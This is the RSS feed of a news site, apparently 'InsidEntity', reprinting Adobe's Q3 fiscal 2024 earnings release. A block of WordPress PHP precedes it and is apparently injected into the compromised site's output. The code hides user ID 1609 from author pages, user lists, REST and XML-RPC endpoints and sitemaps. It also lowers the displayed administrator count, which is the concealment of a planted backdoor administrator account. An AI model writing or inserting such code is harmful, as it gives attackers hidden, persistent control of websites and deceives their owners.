add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 1609;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 1609 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 1609 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 1609;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 1609;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 1609;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/1609(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 1609;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Adobe Archives - InsidEntity
https://ie3.euptest.org/category/companies/adobe/
Story behind company leadership and financialsWed, 02 Oct 2024 05:04:36 +0000en-US
hourly
1 https://wordpress.org/?v=7.1https://ie3.euptest.org/wp-content/uploads/2022/03/cropped-InsidEntity-logo_Icon-colour-32x32.pngAdobe Archives - InsidEntity
https://ie3.euptest.org/category/companies/adobe/
3232Adobe: Reports Record Revenue in Q3 Fiscal 2024
https://ie3.euptest.org/adobe-reports-record-revenue-in-q3-fiscal-2024/
Tue, 01 Oct 2024 16:43:10 +0000https://www.insidentity.com/?p=96419Adobe (Nasdaq: ADBE) today reported financial results for its third quarter fiscal year 2024 ended Aug. 30, 2024. “Adobe’s record Q3 performance is a testament to our relentless innovation and commitment to delivering value to our customers,” said Shantanu Narayen, chair and CEO, of Adobe. “With groundbreaking advancements in AI across Creative Cloud, Document Cloud and Experience Cloud, we are empowering millions of users worldwide.” “In Q3, Adobe delivered cash flows of over $2 billion and exited the quarter with record RPO, demonstrating the power of combining growth with world-class profitability,” said Dan Durn, executive vice president and CFO, of Adobe. “Given the massive markets we are catalyzing, I’m confident in our ability to drive growth and industry leadership.” Third Quarter Fiscal Year 2024 Financial Highlights Adobe achieved revenue of $5.41 billion in its third quarter of fiscal year 2024, which represents 11 pecent year-over-year growth as reported and in constant currency. Diluted earnings per share was $3.76 on a GAAP basis and $4.65 on a non-GAAP basis. GAAP operating income in the third quarter was $1.99 billion and non-GAAP operating income was $2.52 billion. GAAP net income was $1.68 billion and non-GAAP net income was $2.08 billion. Cash flows from operations were $2.02 billion. Remaining Performance Obligations (“RPO”) exiting the quarter were $18.14 billion. Adobe repurchased approximately 5.2 million shares during the quarter. Third Quarter Fiscal Year 2024 Business Segment Highlights Digital Media segment revenue was $4.00 billion, which represents 11 percent year-over-year growth or 12 percent in constant currency. Document Cloud revenue was $807 million, representing 18 percent year-over-year growth as reported and in constant currency. Creative revenue grew to $3.19 billion, representing 10 percent year-over-year growth or 11 percent in constant currency. Net new Digital Media Annualized Recurring Revenue (“ARR”) was $504 million, exiting the quarter with Digital Media ARR of $16.76 billion. Document Cloud ARR grew to $3.31 billion and Creative ARR grew to $13.45 billion. Digital Experience segment revenue was $1.35 billion, representing 10 percent year-over-year growth as reported and in constant currency. Digital Experience subscription revenue was $1.23 billion, representing 12 percent year-over-year growth as reported and in constant currency. Financial Targets Adobe is providing fourth-quarter targets that factor in current macro economic conditions and year-end seasonal strength. For the full document click the link below: Adobe Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.
Adobe (Nasdaq: ADBE) today reported financial results for its third quarter fiscal year 2024 ended Aug. 30, 2024.
“Adobe’s record Q3 performance is a testament to our relentless innovation and commitment to delivering value to our customers,” said Shantanu Narayen, chair and CEO, of Adobe. “With groundbreaking advancements in AI across Creative Cloud, Document Cloud and Experience Cloud, we are empowering millions of users worldwide.”
“In Q3, Adobe delivered cash flows of over $2 billion and exited the quarter with record RPO, demonstrating the power of combining growth with world-class profitability,” said Dan Durn, executive vice president and CFO, of Adobe. “Given the massive markets we are catalyzing, I’m confident in our ability to drive growth and industry leadership.”
Third Quarter Fiscal Year 2024 Financial Highlights
Adobe achieved revenue of $5.41 billion in its third quarter of fiscal year 2024, which represents 11 pecent year-over-year growth as reported and in constant currency. Diluted earnings per share was $3.76 on a GAAP basis and $4.65 on a non-GAAP basis.
GAAP operating income in the third quarter was $1.99 billion and non-GAAP operating income was $2.52 billion. GAAP net income was $1.68 billion and non-GAAP net income was $2.08 billion.
Cash flows from operations were $2.02 billion.
Remaining Performance Obligations (“RPO”) exiting the quarter were $18.14 billion.
Adobe repurchased approximately 5.2 million shares during the quarter.
Third Quarter Fiscal Year 2024 Business Segment Highlights
Digital Media segment revenue was $4.00 billion, which represents 11 percent year-over-year growth or 12 percent in constant currency. Document Cloud revenue was $807 million, representing 18 percent year-over-year growth as reported and in constant currency. Creative revenue grew to $3.19 billion, representing 10 percent year-over-year growth or 11 percent in constant currency.
Net new Digital Media Annualized Recurring Revenue (“ARR”) was $504 million, exiting the quarter with Digital Media ARR of $16.76 billion. Document Cloud ARR grew to $3.31 billion and Creative ARR grew to $13.45 billion.
Digital Experience segment revenue was $1.35 billion, representing 10 percent year-over-year growth as reported and in constant currency. Digital Experience subscription revenue was $1.23 billion, representing 12 percent year-over-year growth as reported and in constant currency.
Financial Targets
Adobe is providing fourth-quarter targets that factor in current macro economic conditions and year-end seasonal strength.